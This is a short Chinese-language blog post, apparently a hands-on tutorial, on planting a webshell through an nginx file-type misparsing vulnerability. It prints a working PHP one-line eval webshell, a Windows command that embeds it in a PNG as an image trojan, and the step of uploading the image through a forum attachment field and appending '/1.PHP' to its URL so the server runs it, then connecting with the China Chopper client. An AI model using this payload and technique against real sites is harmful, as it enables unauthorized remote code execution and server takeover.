WEBSHELL姿勢之nginx文件類型錯誤解析漏洞實例

關於nginx文件類型錯誤解析可參看我的上一篇文章

已知測試系統存在nginx文件類型錯誤解析漏洞,我們要找的就是一個圖片上傳點。


於是我們找一個回帖處的上傳附件,這裏先介紹一下製作木馬圖片

圖片任取一張(有時不同格式的圖片,可能運行有差異,jpg、png、gif都可以試試)

至於一句話木馬,網上各種變異也很多,這裏由於是測試,我們簡單使用

<?php @eval($_POST['chopper']);?>
在windows環境下,使用命令

copy upload.png/b+shell.php/a shell.png
生成圖片木馬

上傳成功後,找到圖片地址在後面加上/1.PHP


這是圖片已被作爲PHP文件進行解析

最後祭上菜刀




發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章